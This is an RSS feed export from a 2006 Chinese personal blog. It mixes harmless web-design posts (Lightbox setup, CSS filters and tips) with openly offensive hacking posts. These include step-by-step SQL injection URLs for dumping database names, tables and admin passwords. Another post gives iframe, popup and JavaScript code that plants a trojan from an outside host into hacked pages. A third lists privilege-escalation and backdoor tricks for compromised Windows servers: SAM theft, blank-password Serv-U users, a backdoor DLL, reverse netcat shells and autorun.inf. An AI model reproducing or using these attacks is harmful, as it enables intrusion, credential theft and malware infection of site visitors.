<![CDATA[印象工作工作室]]> http://www.loveni.net/log/ PJBlog2 2006-12-13T03:47:18+08:00 <![CDATA[Lightbox JS v2.0]]> 守望麦田 http://www.loveni.net/log/ admin@loveni.net 2006-12-13T03:47:18+08:00 2006-12-13T03:47:18+08:00
Lightbox JS 是一个简单而又谦恭的用来把图片覆盖在当前页面上的脚本. 它能被快速安装并且运作于所有流行的浏览器



如何使用:
步骤 1 - 安装 
Lightbox v2.0 使用 Prototype 框架和 Scriptaculous 效果库. 你将需要外调这三个 Javascript 文件在你的 header. 

<script type="text/javascript" src="js/prototype.js"></script> 
<script type="text/javascript" src="js/scriptaculous.js?load=effects"></script> 
<script type="text/javascript" src="js/lightbox.js"></script>

外调 Lightbox CSS 文件 (或添加 Lightbox 样式到你现行的样式表中). 

<link rel="stylesheet" href="css/lightbox.css" type="text/css" media="screen" />

检查 CSS 并确定调用的 prev.gif 和 next.gif 文件在正确的位置. 同样要确定调用的 loading.gif 和 close.gif 文件及 lightbox.js 文件在正确的位置. 
步骤 2 - 激活

添加 rel="lightbox" 属性到任何一个链接标签去激活lightbox. 例如: 

<a href="images/image-1.jpg" rel="lightbox" title="my caption">image #1</a>

可选择项: 使用 title 属性加上说明. 

如果你有一套你想分组的相关图片, 接着上一部并且又在 rel 属性中添加一个带方括号的组名. 例如: 

<a href="images/image-1.jpg" rel="lightbox[roadtrip]">image #1</a>
<a href="images/image-2.jpg" rel="lightbox[roadtrip]">image #2</a>
<a href="images/image-3.jpg" rel="lightbox[roadtrip]">image #3</a>

没有限定每个页面的图片组数量和每个图片组图片的数量. 疯了! 

 

详细说明:http://www.zcool.com.cn/download/js/01/lightbox2.html
下载地址:http://www.zcool.com.cn/download/js/01.zip
]]> http://www.loveni.net/log/default.asp?id=25 <![CDATA[从暴库到暴密码的一般步骤]]> 守望麦田 http://www.loveni.net/log/ admin@loveni.net 2006-12-13T03:21:16+08:00 2006-12-13T03:21:16+08:00 步骤,使得思路更清晰些。 
SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般 
步骤,希望能对你有帮助。1:暴出所有库名. 
http://www.***.com/***.asp?id=1 and 0<>(select count(*) 
from master.dbo.sysdatabases where name>1 and dbid=6) 
依次提交 dbid = 7,8,9.... 得到更多的数据库名 

2:暴出库中的表 
假设存在一个bbs的数据库,提交下面的语句: 
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.sysobjects where xtype='U') 
来得到一个表 假设为 admin 
提交: 
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.sysobjects where xtype='U' and name not in 
('Admin')) 
来得到其他的表。 

3:暴出表中的字段 
提交: 
http://www.***.com/***.asp?id=1 and 0<>(select count(*) 
from bbs.dbo.sysobjects where xtype='U' and name='admin' 
and uid>(str(id))) 
得到UID的数值假设为18779569 uid=id 
提交: 
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.syscolumns where id=18779569) 
得到一个admin的一个字段,假设为 user_id 
提交: 
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.syscolumns where id=18779569 and name not in 
('id',...)) 
来暴出其他的字段 

4:暴出用户名和密码等 
假设存在user_id username ,password 等字段,提交: 
http://www.***.com/***.asp?id=1 and 0<(select user_id from 
BBS.dbo.admin where username>1) 
可以得到用户名 
依次可以得到密码。。。。。 
]]> http://www.loveni.net/log/default.asp?id=24 <![CDATA[望乡]]> admin http://www.loveni.net/log/ admin@loveni.net 2006-12-13T03:16:26+08:00 2006-12-13T03:16:26+08:00






]]> http://www.loveni.net/log/default.asp?id=23 <![CDATA[CSS滤镜]]> 守望麦田 http://www.loveni.net/log/ admin@loveni.net 2006-12-13T03:10:25+08:00 2006-12-13T03:10:25+08:00   众所周知,Javascript或Vbscript作为脚本语言,其功能是不完善的,有许多高级语言的功能无法实现,如图象的处理功能。Filter是微软对CSS的扩展,与PhotoShop中的滤镜概念相似,它可以用很简单的方法对页面中的文字特效作出特效处理,静态如阴影、模糊的效果,动态如各种淡入淡出效果。
  如果你使用过图形软件的话,视觉滤镜这个概念你一定不会感到陌生。你可以选择一个图形,让计算机对其进行模糊过滤,或者将有些文字或图象反转处理。要想实现这些技巧,你得将需要变化的内容以位图形式输入你的图象处理软件,应用相应的过滤器,然后及其以GIF或JPEG格式发布。
  但是生成文字的图象格式会破坏原有文字的存储格式并且会延长下载的时间。生命的一分一秒被消耗在下载的漫长等待之中实在是一种残忍的折磨和享受。但是你需要为你的标题添加一点漂亮的蓝色下落阴影,并且在其四周环绕以红色的光晕。好吧,我们就给它加上一个漂亮的修饰。
  有时候当图象下载到客户端时你需要对图象做一些变化,比如加一个移动模糊让其“神经质”地滑过屏幕。不要怕,CSS图象过滤器将帮助你实现你的愿望(但是现在只能在微软IE 4.0上实现这些功能)。

 ● 1.CSS静态滤镜样式 (filter)(只有IE4.0以上支持)

  CSS静态滤镜样式的使用方法:{ filter : filtername( parameters1, parameters2, ...) }

Filter样式 简要说明 支持参数 
alpha 设置图片或文字的不透明度 opacity、finishOpacity、style、startX、startY、finishX、finishY、add、direction、strength 
blur 在指定的方向和位置上产生动感模糊效果 add、direction、strength 
chroma 对所选择的颜色进行透明处理 color 
dropShadow 在指定的方向和位置上产生阴影 color、offX、offY、positive 
flipH 沿水平方向翻转对象   
flipV 沿垂直方向翻转对象   
glow 在对象周围上发光 color、strength 
gray 将对象以灰度处理   
invert 逆转对象颜色   
light 对对象进行模拟光照   
mask 对对象生成掩膜 color 
shadow 沿对象边缘产生阴影 color、direction 
wave 在垂直方向产生正弦波形 add、freq、lightStrength、phase、strength 
xray 改变对象颜色深度,并绘制黑白图象   

  以上就是静态滤镜的全部内容,要注意的是CSS是区分大小写的!

 ● 2.CSS动态滤镜

  动态滤镜可以为页面添加动人的淡入淡出、图象转化效果,它可以分为两种blend(混合)和reveal(显示),前者可以使对象渐渐消失或出现,后者提供了24种图象转化的效果。对于动态滤镜的调用除去象在静态滤镜中要定义的滤镜类型,参数等等,还用到脚本语言控制它的状态。
  首先,在开始一个动态效果之前,先需要进行装备(Apply),然后播放(Play)动态效果,在动态效果进行中还可以中断动态效果(Stop),以上可以用下面的方法实现:
    对象名.filters(滤镜数值).Apply()
    对象名.filters(滤镜数值).Play()
    对象名.filters(滤镜数值).Stop()
  对于滤镜状态的判断可以通过“对象名.filters(滤镜数值).status”判断,该值为0时,表示滤镜未执行,为1时,表示滤镜已经完成,为2时表示滤镜在执行中。
  在定义filter时,如上面所提到的,可以有混合(“filter:blendTrans(duration=时间数值)”,duration表示滤镜执行需要的时间,单位为秒)和显示(“filter:revealTrans(duration=时间数值,transition=过渡类型)”,过渡类型为从0-23的数值)两种。

  滤镜目前还未被W3C正式承认。滤镜只是微软IE浏览器的组成部分,不能用于Netscape浏览器。制定有关标准的组织正在就此进行讨论,但尚未达成最后定论。在我看来,滤镜是一种非常有趣而且是制作精彩的视觉效果必不可少的一部分。滤镜能节省带宽,而且是你能在制作奇妙的
视觉设计时使用文字格式,而不必先制作庞大的文字位图以取得相同的效果。 
  但由于这些功能尚未成为HTML的正式组成部分,所以并不是所有的浏览器都能看到这些特色。有些时候,你必须考虑以传统的方式制作相同的效果,当然,你不得不继续将庞大的GIF文件塞到网页之中。
]]> http://www.loveni.net/log/default.asp?id=22 <![CDATA[CSS按钮实例]]> 守望麦田 http://www.loveni.net/log/ admin@loveni.net 2006-12-13T03:00:55+08:00 2006-12-13T03:00:55+08:00 http://www.cssplay.co.uk/
是一专注于CSS的各种可能性的探索与理解的个人网站。从标准的超链接到他的奇异的实验性技术。他所有的例子都只使用CSS--没有javascript,或者其他任何语言使用在他的例子里。
这里是我从他网站上下载来修改的CSS按钮实例代码.
如下:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ASPid's Blog menu Demo</title>
<style type="text/css">
<!--
#menu {
  width:8em;
  padding:0.5em;
  background:#ccc;
  font-family: "Terminal";
 }
#menu a, #menu a:visited {
 display:block; 
 width:7em; 
 color:#669900; 
 text-align:center; 
 background-color:#fff; 
 text-decoration:none;
 margin:0.5em 0; 
 border-left:0.5em solid #9ab; 
 }
#menu a:hover {
 color:#f00; 
 border-left:0.5em solid #000; 
 }
.box {
 position:relative;
 }
-->
</style>
</head>

<body>
<div id="menu">
 <div class="box">
 <a href="default.asp?cat=8">
 IT News
 </a>
 </div>
 <div class="box">
 <a href="default.asp?cat=1">
 Web Design
 </a>
 </div>
 <div class="box">
 <a href="default.asp?cat=5">
 Development
 </a>
 </div>
 <div class="box">
 <a href="default.asp?cat=4">
 Art Design
 </a>
 </div>
 <div class="box">
 <a href="default.asp?cat=9">
 MX Studio
 </a>
 </div>
</div>

</body>
</html>]]> http://www.loveni.net/log/default.asp?id=21 <![CDATA[学习DIV+CSS布局的一些常用资料整理]]> admin http://www.loveni.net/log/ admin@loveni.net 2006-12-13T01:54:17+08:00 2006-12-13T01:54:17+08:00
页面上所有图片自动缩放的代码


[Copy to clipboard]
CODE:
<script language="JavaScript">
var imgObj;
for(i = 0; i < document.all.length; i++)
{
if(document.all(i).tagName.toLowerCase()=="img")
{
  imgObj = document.all(i)  //建议只判断高度或者宽度其中一个,那样可以自动按比例缩放
  if (imgObj.height>500)  //判断图片的高度,如果大于500,则设置为500,值可以自己修改
  {
   imgObj.height=500
  }
  if (imgObj.width>700)  //判断图片的宽度,如果大于700,则设置为700,值可以自己修改
  {
   imgObj.width=700
  }
}
}

</script>

滚动条的颜色定义


[Copy to clipboard]
CODE:
scrollbar-face-color: #E0D5BE;<!--//滚动条页面颜色设定--> 
scrollbar-track-color: #EBE4D3;<!--//滚动条底版颜色设定--> 
scrollbar-highlight-color: #ffffff;<!--//滚动条斜面和左面颜色设定--> 
scrollbar-shadow-color: #ffffff;<!--//滚动条下斜面和右面颜色设定--> 
scrollbar-3dlight-color: #ffffff;<!--//滚动条上边和左边的边沿颜色设定--> 
scrollbar-dark-shadow-color: #ffffff;<!--//滚动条下边和右边的边沿颜色设定--> 
scrollbar-arrow-color: #978C71;<!--//滚动条两端箭头颜色设定-->         

给图片加边框
在CSS文件中对img定义边界(border),例如我在CSS中定义了:


[Copy to clipboard]
CODE:
img.framed { 
padding: 6px; 
border: 1px solid #CCC; 
background-color: #FFF; } 

那么在HTML文件中,针对嵌入的图片定义class="framed"就会有相应的边框效果。


[Copy to clipboard]
CODE:
<img src="......" class="framed" >

在FF下一个自适应高度的简单做法


[Copy to clipboard]
CODE:
加上
height: 100%;
overflow: auto;

自动换行的简单做法


[Copy to clipboard]
CODE:
        table-layout: fixed;
        WORD-BREAK: break-all;
        WORD-WRAP: break-word;

怎样用CSS把层做成半透明?


[Copy to clipboard]
CODE:
用下面的样式表定义你的层 
.alpha { filter: Alpha(Opacity=50, FinishOpacity=50, Style=0, StartX=0, StartY=0, FinishX=100, FinishY=100}

解释:
Opacity=开始的不透明度(100的话就不透明了) 
FinishOpacity=结束的不透明度(100的话就不透明了) 
Style=样式,从0开始,1.2.3....有均匀透明啊,放射形状透明啊... 
StartX=开始透明的X坐标,基本上为图片、层的左上角(0) 
StartY= 开始透明的Y坐标,基本上也为图片、层的左上角(0) 
FinishX=结束透明的X坐标,基本上也图片、层的右下(图片、层的宽度) 
FinishY=结束透明的Y坐标,基本上也为图片、层的右下角(图片、层的高度)

再谈一下关于清除浮动(闭合浮动元素)最简单的方法
最简单的清除浮动(闭合浮动元素的方法是在父级容器内,浮动对象下面再插入一个额外的DIV标签,来清除浮动(clear),浏览器兼容性好,没有HACKS,缺点是要增加一个无语义的标签,但在有的布局下,可使这个只起到清除作用的DIV,具有语义化.
先看代码


[Copy to clipboard]
CODE:
<div class="wrap">
    <div id="sideright">
      <p>......</p>
    </div>
    <div id="sideleft">
    <p>......</p>
    </div>
    <div id="foot">
      <address>
      http://www.forest53.com
      </address>
    </div>
  </div>

其中WRAP是父级容器,sideright和sideleft是左、右部分的内容,foot里放了内容,在左、右内容的下面,并在父级容器里面,起到了清除浮动DIV的作用。



有什么能控制滚动条大小的吗?


[Copy to clipboard]
CODE:
<div style="overflow:auto;width:200px; height:150px; zoom:0.5;">
<div style="width:2000px; height:1500px; zoom:2;">
有什么能控制滚动条大小的吗
</div>
</div>

同时调用几个地方的外部CSS


[Copy to clipboard]
CODE:
main.css

@import url(font.css);
@import url(nav.css);
@import url(form.css);
@import url(footer.css);
@import url(ad.css);

各浏览器padding、margin的差异
margin和padding总是有可能要用到,而产生的问题如何解决呢?由于浏览器解释容器宽度的方法不同:
IE 6.0 Firefox Opera等是
真实宽度=width+padding+border+margin
IE5.X
真实宽度=width-padding-border-margin

解决的方法是:


[Copy to clipboard]
CODE:
div.content { 
width:400px; //这个是错误的width,所有浏览器都读到了
voice-family: "\"}\""; //IE5.X/win忽略了"\"}\""后的内容
voice-family:inherit;
width:300px; //包括IE6/win在内的部分浏览器读到这句,新的数值(300px)覆盖掉了旧的

html>body .content { //html>body是CSS2的写法
width:300px; //支持CSS2该写法的浏览器(非IE5)有幸读到了这一句


div.content { 
width:300px !important; //这个是正确的width,大部分支持!important标记的浏览器使用这里的数值
width(空格)/**/:400px; //IE6/win不解析这句,所以IE6/win仍然认为width的值是300px;而IE5.X/win读到这句,新的数值(400px)覆盖掉了旧的,因为!important标记对他们不起作用

html>body .content { //html>body是CSS2的写法
width:300px; //支持CSS2该写法的浏览器有幸读到了这一句


附上:HACK总表





关于W3C检验时候的DIV元素封闭
所有的标记都必须要有一个相应的结束标记
以前在HTML中,你可以打开许多标签,例如<p>和<li>而不一定写对应的</p>和</li>来关闭它们。但在XHTML中这是不合法的。XHTML要求有严谨的结构,所有标签必须关闭。如果是单独不成对的标签,在标签最后加一个"/"来关闭它。例如:

<br /><img height="80" alt="网页设计师" src="../images/logo_w3cn_200x80.gif" width="200" />

成对的标签应有打开标签和关闭标签,例如:
<table><tr><td> </td></tr></table>

没有成对关闭标签的元素 都要加 /

如:
<base>
<br>
<hr>
<img>
<input>
<link>
<meta>
<nobr>



请问如何设置img标签图片自动适应高度?
想请教一下,倘若我设定了img的宽度一定值,我想保持纵横比不变,高度自动适应,该如何设置CSS,能否实现?


[Copy to clipboard]
CODE:
<style type="text/css">
img {
max-width: 200px;
width:expression(this.width > 200 ? "200px" : (this.width+"px"));
}
</style>
<img src="http://gg.blueidea.com/2006/gongyi/banner.jpg"/>

10个你未必知道的CSS技巧

本文作者是:Trenton Moss。 
发表网站是:http://www.webcredible.co.uk/

本翻译并未得到作者或网站授权。一切权利都归原作者及原网站所有。
如果你得到原作者或原发表网站的授权,可以自由使用本翻译。

1.CSS字体属性简写规则

一般用CSS设定字体属性是这样做的:


[Copy to clipboard]
CODE:
font-weight:bold;
font-style:italic;
font-varient:small-caps;
font-size:1em;
line-height:1.5em;
font-family:verdana,sans-serif;

但也可以把它们全部写到一行上去:


[Copy to clipboard]
CODE:
font: bold italic small-caps 1em/1.5em verdana,sans-serif;

真不错!只有一点要提醒的:这种简写方法只有在同时指定font-size和font-family属性时才起作用。而且,如果你没有设定font-weight, font-style, 以及 font-varient ,他们会使用缺省值,这点要记上。

2. 同时使用两个类

一般只能给一个元素设定一个类(Class),但这并不意味着不能用两个。事实上,你可以这样:


[Copy to clipboard]
CODE:
<p class="text side">...</p>

同时给P元素两个类,中间用空格格开,这样所有text和side两个类的属性都会加到P元素上来。如果它们两个类中的属性有冲突的话,后设置的起作用,即在CSS文件中放在后面的类的属性起作用。

补充:对于一个ID,不能这样写<p id="text side">...</p>也不能这样写

3. CSS border的缺省值

通常可以设定边界的颜色,宽度和风格,如:


[Copy to clipboard]
CODE:
border: 3px solid #000

这位把边界显示成3像素宽,黑色,实线。但实际上这里只需要指定风格即可。

如果只指定了风格,其他属性就会使用缺省值。一般地,Border的宽度缺省是medium,一般等于3到4个像素;缺省的颜色是其中文字的颜色。如果这个值正好合适的话,就不用设那么多了。

4. CSS用于文档打印

许多网站上都有一个针对打印的版本,但实际上这并不需要,因为可以用CSS来设定打印风格。

也就是说,可以为页面指定两个CSS文件,一个用于屏幕显示,一个用于打印:


[Copy to clipboard]
CODE:
<link type="text/css" rel="stylesheet" href="stylesheet.css" media="screen" /> <link type="text/css" rel="stylesheet" href="printstyle.css" media="print" /> 

第1行就是显示,第2行是打印,注意其中的media属性。

但应该在打印CSS中写什么东西呢?你可以按设计普通CSS的方法来设定它。设计的同时就可以把这个CSS设成显示CSS来检查它的效果。也许你会使用 display: none 这个命令来关掉一些装饰图片,再关掉一些导航按钮。要想了解更多,可以看“打印差异”这一篇。

5. 图片替换技巧

一般都建议用标准的HTML来显示文字,而不要使用图片,这样不但快,也更具可读性。但如果你想用一些特殊字体时,就只能用图片了。

比如你想整个卖东西的图标,你就用了这个图片:


[Copy to clipboard]
CODE:
<h1><img src="widget-image.gif" alt="Buy widgets" /></h1>

这当然可以,但对搜索引擎来说,和正常文字相比,它们对alt里面的替换文字几乎没有兴趣这是因为许多设计者在这里放许多关键词来骗搜索引擎。所以方法应该是这样的:
<h1>Buy widgets</h1>
但这样就没有特殊字体了。要想达到同样效果,可以这样设计CSS:


[Copy to clipboard]
CODE:
h1 { background: url(widget-image.gif) no-repeat; height: image height text-indent: -2000px } 

注意把image height换成真的图片的高度。这里,图片会当作背景显示出来,而真正的文字由于设定了-2000像素这个缩进,它们会出现在屏幕左边2000点的地方,就看不见了。但这对于关闭图片的人来说,可能全部看不到了,这点要注意。

6. CSS box模型的另一种调整技巧

这个Box模型的调整主要是针对IE6之前的IE浏览器的,它们把边界宽度和空白都算在元素宽度上。比如:


[Copy to clipboard]
CODE:
#box { width: 100px; border: 5px; padding: 20px } 

这样调用它:
<div id="box">...</div>
这时盒子的全宽应该是150点,这在除IE6之前的IE浏览器之外的所有浏览器上都是正确的。但在IE5这样的浏览器上,它的全宽仍是100点。可以用以前人发明的Box调整方法来处理这种差异。

但用CSS也可以达到同样的目的,让它们显示效果一致。


[Copy to clipboard]
CODE:
#box { width: 150px } #box div { border: 5px; padding: 20px } 

这样调用:


[Copy to clipboard]
CODE:
<div id="box"><div>...</div></div>

这样,不管什么浏览器,宽度都是150点了。

7. 块元素居中对齐

如果想做个固定宽度的网页并且想让网页水平居中的话,通常是这样:


[Copy to clipboard]
CODE:
#content { width: 700px; margin: 0 auto } 

你会使用 <div id="content"> 来围上所有元素。这很简单,但不够好,IE6之前版本会显示不出这种效果。改CSS如下:


[Copy to clipboard]
CODE:
body { text-align: center } #content { text-align: left; width: 700px; margin: 0 auto } 

这会把网页内容都居中,所以在Content中又加入了


[Copy to clipboard]
CODE:
text-align: left 。

8. 用CSS来处理垂直对齐

垂直对齐用表格可以很方便地实现,设定表格单元 vertical-align: middle 就可以了。但对CSS来说这没用。如果你想设定一个导航条是2em高,而想让导航文字垂直居中的话,设定这个属性是没用的。

CSS方法是什么呢?对了,把这些文字的行高设为 2em:line-height: 2em ,这就可以了。

9. CSS在容器内定位

CSS的一个好处是可以把一个元素任意定位,在一个容器内也可以。比如对这个容器:


[Copy to clipboard]
CODE:
#container { position: relative } 

这样容器内所有的元素都会相对定位,可以这样用:
<div id="container"><div id="navigation">...</div></div>
如果想定位到距左30点,距上5点,可以这样:


[Copy to clipboard]
CODE:
#navigation { position: absolute; left: 30px; top: 5px } 

当然,你还可以这样:


[Copy to clipboard]
CODE:
margin: 5px 0 0 30px

注意4个数字的顺序是:上、右、下、左。当然,有时候定位的方法而不是边距的方法更好些。

10. 直通到屏幕底部的背景色

在垂直方向是进行控制是CSS所不能的。如果你想让导航栏和内容栏一样直通到页面底部,用表格是很方便的,但如果只用这样的CSS:


[Copy to clipboard]
CODE:
#navigation { background: blue; width: 150px } 

较短的导航条是不会直通到底部的,半路内容结束时它就结束了。该怎么办呢?

不幸的是,只能采用欺骗的手段了,给这较短的一栏加上个背景图,宽度和栏宽一样,并让它的颜色和设定的背景色一样。


[Copy to clipboard]
CODE:
body { background: url(blue-image.gif) 0 0 repeat-y } 

此时不能用em做单位,因为那样的话,一旦读者改变了字体大小,这个花招就会露馅,只能使用px。

本文作者是:Trenton Moss。 
发表网站是:http://www.webcredible.co.uk/

本翻译并未得到作者或网站授权。一切权利都归原作者及原网站所有。
如果你得到原作者或原发表网站的授权,可以自由使用本翻译。 





常用CSS缩写语法总结 

使用缩写可以帮助减少你CSS文件的大小,更加容易阅读。css缩写的主要规则如下:

颜色
16进制的色彩值,如果每两位的值相同,可以缩写一半,例如:


[Copy to clipboard]
CODE:
#000000可以缩写为#000;#336699可以缩写为#369;

盒尺寸
通常有下面四种书写方法:


[Copy to clipboard]
CODE:
property:value1; 表示所有边都是一个值value1; 
property:value1 value2; 表示top和bottom的值是value1,right和left的值是value2 
property:value1 value2 value3; 表示top的值是value1,right和left的值是value2,bottom的值是value3 
property:value1 value2 value3 value4; 四个值依次表示top,right,bottom,left 
方便的记忆方法是顺时针,上右下左。具体应用在margin和padding的例子如下:
margin:1em 0 2em 0.5em; 

边框(border)
边框的属性如下:


[Copy to clipboard]
CODE:
border-width:1px; 
border-style:solid; 
border-color:#000; 
可以缩写为一句:border:1px solid #000; 

语法是border:width style color; 

背景(Backgrounds)
背景的属性如下:


[Copy to clipboard]
CODE:
background-color:#f00; 
background-image:url(/oblog/background.gif); 
background-repeat:no-repeat; 
background-attachment:fixed; 
background-position:0 0; 
可以缩写为一句:background:#f00 url(/oblog/background.gif) no-repeat fixed 0 0; 
语法是background:color image repeat attachment position;
你可以省略其中一个或多个属性值,如果省略,该属性值将用浏览器默认值,默认值为:
color: transparent 
image: none 
repeat: repeat 
attachment: scroll 
position: 0% 0% 

字体(fonts)


[Copy to clipboard]
CODE:
字体的属性如下:

font-style:italic; 
font-variant:small-caps; 
font-weight:bold; 
font-size:1em; 
line-height:140%; 
font-family:"Lucida Grande",sans-serif; 
可以缩写为一句:font:italic small-caps bold 1em/140% "Lucida Grande",sans-serif;

注意,如果你缩写字体定义,至少要定义font-size和font-family两个值。

列表(lists)


[Copy to clipboard]
CODE:
取消默认的圆点和序号可以这样写list-style:none;,

list的属性如下:

list-style-type:square; 
list-style-position:inside; 
list-style-image:url(/oblog/image.gif); 
可以缩写为一句:list-style:square inside url(/oblog/image.gif);]]> http://www.loveni.net/log/default.asp?id=20 <![CDATA[网页挂马方法和代码!]]> admin http://www.loveni.net/log/ admin@loveni.net 2006-12-13T01:50:07+08:00 2006-12-13T01:50:07+08:00 方法一:

一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 :
<html>
<iframe src="http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>

把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。

方法二:

<SCRIPT language=javascript>       
window.open("http://192.168.1.3/inc/joke.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");   
</script> 
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了,flash木马也很厉害的哦。

方法三:

还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src='http://192.168.1.3/inc/joke.htm' name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............

方法四:
代码加进包含文件<!--#include file="conn.asp"--> 

]]> http://www.loveni.net/log/default.asp?id=19 <![CDATA[21种SHELL提权思路]]> admin http://www.loveni.net/log/ admin@loveni.net 2006-12-13T01:47:54+08:00 2006-12-13T01:47:54+08:00
1.radmin连接法 

 条件是你权限够大,对方连_blank">防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。 

2.paanywhere 

 C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\ 这里下他的GIF文件,在本地安装pcanywhere上去 

3.SAM破解 

 C:\\WINNT\\system32\\config\\ 下他的SAM 破解之 

4.SU密码夺取 

 C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\ 

 引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转 
 进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 
[USER=WekweN|1] 
Password= 
HomeDir=c:\\ 
TimeOut=600 
Maintenance=System 
Access1=C:\\|RWAMELCDP 




利用SERV-U做一个隐藏的后门 


现在大多数的WINDOWS服务器都使用SERV-U做FTP服务器,直到serv-u5.2版为止仍然存在本地权限提升漏洞,在获得了最高控制权限之后,需要留下一个隐蔽的后门,以备我们下次光临。查看,serv-u的帮助文件可知,serv-u提供了一个扩展的接口,通过这个接口可以管理用户的的访问权限。所以我们就很容易就根据这个接口留下一个后门。
下面是我写的一个扩展程序,实现的功能是,如果是帐号lgsr来登陆,就不需要密码,同时把服务器的C:\盘映射到该帐号的主目录,同时赋予lgsr帐号的远程管理权限。
下载地址为:
http://www.yueyong.net/down/ServuBack.rar
安装方法:
ServuBack.rar解压,把servu.dll上传到肉鸡上serv-u安装目录,把打开配置文件ServUDaemon.ini,在文件末尾添加
[EXTERNAL]
ClientCheckDLL1=servu.dll
保存,重新启动,serv-u服务,OK,现在在本地打开SERV-U的管理程序
ServUAdmin.exe,右键新建一个服务器,输入肉鸡的IP地址,帐号lgsr,密码随便填,再填上肉鸡的FTP端口
连接,好了,现在可以远程管理肉鸡上的FTP了,可以随便添加帐号,修改帐号。
另外可以直接用FTP软件用帐号lgsr登陆,密码随便填,就可以访问肉鸡的C盘,上传,修改文件,并具有执行权限。


在肉鸡的SER-U管理程序并不会显示lgsr这个帐号在帐号列表里面,但是当用lgsr帐号连接时时可以看到连接的帐号名和IP地址的



Access1=d:\\|RWAMELCDP 
Access1=f:\\|RWAMELCDP 
SKEYValues= 
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 

5.c:\\winnt\\system32\\inetsrv\\data\\ 

 引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 

6.SU溢出提权 

 这个网上教程N多 不详细讲解了 

7.运行Csript 

 引用:运行"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 
用这个cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps 
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
再将asp.dll加入特权一族 
asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定一样) 
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll" 
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 

8.脚本提权 

c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动"写入bat,vbs 

9.VNC 

 这个是小花的文章 HOHO 

 默认情况下VNC密码存放在HKCU\\Software\\ORL\\WinVNC3\\Password 

 我们可以用vncx4 

 破解它,vncx4使用很简单,只要在命令行下输入 

 c:\\>vncx4 -W 

 然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。 

10.NC提权 

 给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了 

11.社会工程学之GUEST提权 
 很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO 

12.IPC空连接 

 如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令 

13.替换服务 

 这个不用说了吧?个人感觉相当复杂 

14.autorun .inf 

 autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行 

15.desktop.ini与Folder.htt 

 引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码: <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”> </OBJECT> 然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门 

16.su覆盖提权 

 本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了 

17.SU转发端口 

